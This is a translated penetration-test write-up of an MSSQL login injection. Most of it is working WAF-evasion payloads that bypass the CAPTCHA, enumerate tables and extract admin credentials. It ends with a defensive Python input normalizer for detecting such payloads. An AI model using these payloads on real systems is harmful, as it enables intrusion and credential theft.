
Title: Notes from a real-world MSSQL injection that bypassed a WAF


This was an authorized test. The injection point is the username field of the back-end (admin) login.

A verification code (CAPTCHA) is present, but it can be bypassed by deleting the cookie and the verification-code fields from the request.

Adding a single quote produces an error.

and '1'='1

Connection reset: intercepted by the WAF.

Change the case of the keyword and replace the space with an MSSQL whitespace character ([0x00-0x20]).

%1eaNd%1e'1'='1


Query the database version: MSSQL 2012 x64.

%1eoR%1e1=@@version%1e--


Query the current user

%1eoR%1e1=user%1e--


Query whether the current user is dba or db_owner.

;if(0=(SelEct%1eis_srvrolemember('sysadmin'))) WaItFOR%1edeLAY%1e'0:0:5'%1e --

;if(0=(SelEct%1eis_srvrolemember('db_owner'))) WaItFOR%1edeLAY%1e'0:0:5'%1e --

Both requests delay, so the current user is neither dba nor db_owner.

Try to execute xp_cmdshell: no relevant permissions.

;eXeC%1esp_configure%1e'show advanced options',1;RECONFIGURE%1e --

;eXeC%1esp_configure%1e'xp_cmdshell',1;RECONFIGURE%1e --


Query the current database; connection reset: intercepted by the WAF.

%1eoR%1e1=(db_name()%1e)%1e--


Removing one character of the function name makes the response return normally, so the WAF filters the function db_name(). MSSQL and MySQL share some similar features; for example, comments or whitespace characters can be inserted between a function name and its brackets.

%1eoR%1e1=(db_name/**/()%1e)%1e--


Query the tables of the current database; connection reset: intercepted by the WAF.

%1eoR%1e1=(SelEct%1eop%1e1%1etaBle_nAme from%1einfOrmatiOn_sChema.tAbles%1e)%1e--


Deleting the statement after select makes the response return normally. In an IIS+ASPX environment, if several parameters with the same name are submitted at the same time, the server receives that parameter as the multiple values joined with commas. In practice, the comma can be commented out with the aid of a comment.

%1eoR%1e1=(SelEct/*username=*/%1eop%1e1%1etaBle_nAme from%1einfOrmatiOn_sChema.tAbles%1e)%1e--

Still intercepted.

Deleting one character of infOrmatiOn_sChema.tAbles makes the response return normally, so the WAF filters infOrmatiOn_sChema.tAbles. When I was learning MySQL injection, I saw the official documentation say: 'The qualification character is a separate token and need not be contiguous with the associated identifiers.' So whitespace characters can be inserted on either side of the qualifier (such as '.'), and testing shows MSSQL has the same characteristic: infOrmatiOn_sChema.tAbles -> infOrmatiOn_sChema%0f.%0ftAbles

%1eoR%1e1=(SelEct/*username=*/%1eop%1e1%1etaBle_nAme from%1einfOrmatiOn_sChema%0f.%0ftAbles%1e)%1e--


Table names can be enumerated one by one with not in('table_1','table_2', ...).

Manual injection is too slow with that method, so query all table names at once.

%1eoR%1e1=(SelEct/*username=*/%1equotename(name)%1efRom bak_ptfl%0f.sysobjects%1ewHerE%1extype='U' FOR XML PATH(''))%1e--


Judging from the table names, the administrator table should be appsadmin, so query all columns of that table at once.

%1eoR%1e1=(SelEct/*username=*/%1equotename/**/(name)%1efRom bak_ptfl%0f.syscolumns%1ewHerE%1eid=(selEct/*username=*/%1eid%1efrom%1ebak_ptfl%0f.sysobjects%1ewHerE%1ename='appsadmin')%1efoR%1eXML%1ePATH/**/(''))%1e--password=admin


This yields the administrator username and password fields: AdminName, Password. Query the username and password.

%1eoR%1e1=(SelEct/*username=*/%1etOp%1e1%1eAdminName%1efRom%1eappsadmin%1e)%1e--

%1eoR%1e1=(SelEct/*username=*/%1etOp%1e1%1epassword%1efRom%1eappsadmin)%1e--


After decrypting the password hash, I logged into the back end successfully.

Summary

1. Captured the target site's requests with BP (Burp Suite) and found that the target system uses a verification code.

2. Deleted the cookie parameter and its value, and the verification-code parameter and its value, from the request packet.

3. Sent the request again and got no message about a verification-code error.

4. Added a single quote to the username in the POST body, which produced an error.

username=amdin'password=admin

5. Tested and '1'='1; nothing was displayed, so the target system has a WAF.

username=amdin' and '1'='1password=admin

6. Changed the case of the and keyword and replaced the space with an MSSQL whitespace character ([0x00-0x20]), namely %1e. The normal content is echoed back.

username=amdin'%1eaNd%1e'1'='1password=admin

7. Queried the database version.

username=amdin'%1eoR%1e1=@@version%1e--password=admin

8. Queried the current user.

username=amdin'%1eoR%1e1=user%1e--password=admin

9. Queried whether the current user is dba or db_owner; both requests delayed, so the current user is neither dba nor db_owner.

username=amdin';if(0=(SelEct%1eis_srvrolemember('sysadmin'))) WaItFOR%1edeLAY%1e'0:0:5'%1e --password=admin

username=amdin';if(0=(SelEct%1eis_srvrolemember('db_owner'))) WaItFOR%1edeLAY%1e'0:0:5'%1e --password=admin

10. Tried to execute xp_cmdshell: no relevant permissions, and the response says xp_cmdshell does not exist.

username=amdin';eXeC%1esp_configure%1e'show advanced options',1;RECONFIGURE%1e --password=admin

username=amdin';eXeC%1esp_configure%1e'xp_cmdshell',1;RECONFIGURE%1e --password=admin

11. Queried the current database name; connection reset: intercepted by the WAF.

username=amdin'%1eoR%1e1=(db_name()%1e)%1e--password=admin

12. The WAF may intercept the db_name() function. Here, a comment /**/ or whitespace characters can be inserted between the function name and the parentheses to obtain the current database name successfully.

username=amdin'%1eoR%1e1=(db_name/**/()%1e)%1e--password=admin

13. Queried the tables of the current database; connection reset: intercepted by the WAF.

username=amdin'%1eoR%1e1=(SelEct%1eop%1e1%1etaBle_nAme from%1einfOrmatiOn_sChema.tAbles%1e)%1e--password=admin

14. Deleting the statement after select makes the response return normally. In an IIS+ASPX environment, if several parameters with the same name are submitted at the same time, the server receives that parameter as the multiple values joined with commas. In practice, the comma can be commented out with a comment, but the request is still intercepted by the WAF.

username=amdin'%1eoR%1e1=(SelEct/*username=*/%1eop%1e1%1etaBle_nAme from%1einfOrmatiOn_sChem.tAbles%1e)%1e--password=admin

15. Deleting one character of infOrmatiOn_sChema.tAbles makes the response return normally, so the WAF filters infOrmatiOn_sChema.tAbles. When I was learning MySQL injection, I saw the official documentation say: 'The qualification character is a separate token and need not be contiguous with the associated identifiers.' So whitespace characters can be inserted on either side of the qualifier (such as '.'), and testing shows MSSQL has the same characteristic: infOrmatiOn_sChema.tAbles -> infOrmatiOn_sChema%0f.%0ftAbles. This successfully obtains a table name.

username=amdin'%1eoR%1e1=(SelEct/*username=*/%1eop%1e1%1etaBle_nAme from%1einfOrmatiOn_sChema%0f.%0ftAbles%1e)%1e--password=admin

16. Queried all table names at once.

username=amdin'%1eoR%1e1=(SelEct/*username=*/%1equotename(name)%1efRom bak_ptfl%0f.sysobjects%1ewHerE%1extype='U' FOR XML PATH(''))%1e--password=admin

17. Judging from the table names, the administrator table should be appsadmin, so queried all columns of that table at once.

username=amdin'%1eoR%1e1=(SelEct/*username=*/%1equotename/**/(name)%1efRom bak_ptfl%0f.syscolumns%1ewHerE%1eid=(selEct/*username=*/%1eid%1efrom%1ebak_ptfl%0f.sysobjects%1ewHerE%1ename='appsadmin')%1efoR%1eXML%1ePATH/**/(''))%1e--password=admin

18. This yields the administrator username and password fields: AdminName, Password. Queried the username and password.

username=amdin'%1eoR%1e1=(SelEct/*username=*/%1etOp%1e1%1eAdminName%1efRom%1eappsadmin%1e)%1e--password=admin

username=amdin'%1eoR%1e1=(SelEct/*username=*/%1etOp%1e1%1epassword%1efRom%1eappsadmin)%1e--password=admin

20. Decrypted the password hash of that username and successfully logged into the back end.

Original link: https://xz.aliyun.com/t/7487
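Added example, not part of the original post: the write-up above defeats the WAF with three input tricks (control characters in [0x00-0x20] used as whitespace, inline /**/ comments as separators, and whitespace around the '.' qualifier and before the function parentheses). The defensive counterpart is to normalize the input the way the MSSQL parser will read it before applying any signature. The Python below does exactly that and runs the same rule set twice, once on the merely URL-decoded input and once on the normalized form, so the effect of normalization is visible. The payload samples are constructed after the ones in the write-up, and the rule names, the `normalize`/`match_rules`/`classify` functions and the signatures are my own assumptions, not any WAF vendor's rules.

```python
import re
from urllib.parse import unquote

# Constructed samples modelled on the write-up's payloads (URL-encoded, as they
# travel in the POST body). %1e and %0f are control characters that MSSQL treats
# as whitespace; /*...*/ is an inline comment used as a token separator.
CONSTRUCTED_PAYLOADS = {
    "tautology": "%1eaNd%1e'1'='1",
    "version":   "%1eoR%1e1=@@version%1e--",
    "db_name":   "%1eoR%1e1=(db_name/**/()%1e)%1e--",
    "tables":    "%1eoR%1e1=(SelEct/*x=*/%1etOp%1e1%1etaBle_nAme%1efrom"
                 "%1einfOrmatiOn_sChema%0f.%0ftAbles%1e)%1e--",
}

# Hypothetical signatures written against the normalized form: lower-case,
# single ASCII spaces, no comments, no whitespace around '.' or inside '()'.
RULES = {
    "boolean_condition":  r"\b(and|or) \S+ ?=",
    "db_name_call":       r"\bdb_name\(\)",
    "information_schema": r"\binformation_schema\.tables\b",
    "select_from":        r"\bselect .+ from ",
    "system_catalog":     r"\bsys(objects|columns)\b",
    "time_delay":         r"\bwaitfor delay\b",
    "xp_cmdshell":        r"\bxp_cmdshell\b",
}


def normalize(raw: str) -> str:
    """Rewrite a request value into the token stream MSSQL would actually parse."""
    s = unquote(raw)                                    # %1e -> '\x1e', %0f -> '\x0f'
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.DOTALL)   # a comment separates tokens like a space
    s = re.sub(r"[\x00-\x20]+", " ", s)                 # every control char / space run -> one space
    s = re.sub(r" *\. *", ".", s)                       # the '.' qualifier tolerates surrounding blanks
    s = re.sub(r" ?([()]) ?", r"\1", s)                 # so do function and grouping parentheses
    return s.strip().lower()


def match_rules(text: str) -> list:
    """Return the names of all rules that fire on `text`, in RULES order."""
    return [name for name, pattern in RULES.items()
            if re.search(pattern, text, flags=re.IGNORECASE)]


def classify(raw: str) -> dict:
    """Compare URL-decode-only matching with matching after full normalization."""
    return {
        "decoded_only": match_rules(unquote(raw)),
        "normalized":   match_rules(normalize(raw)),
    }


if __name__ == "__main__":
    for label, payload in CONSTRUCTED_PAYLOADS.items():
        result = classify(payload)
        print(f"{label:10s} decoded-only={result['decoded_only']} "
              f"normalized={result['normalized']}")
        print(f"{'':10s} normalized text: {normalize(payload)!r}")
```

Every constructed payload passes the decode-only pass untouched and is caught after normalization; a plain `admin` value fires nothing in either pass. The same normalization is worth applying to request logs before hunting for injection attempts in them, because the raw bodies in the write-up (`%1eoR%1e1=`) would never match a rule that expects an ASCII space.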
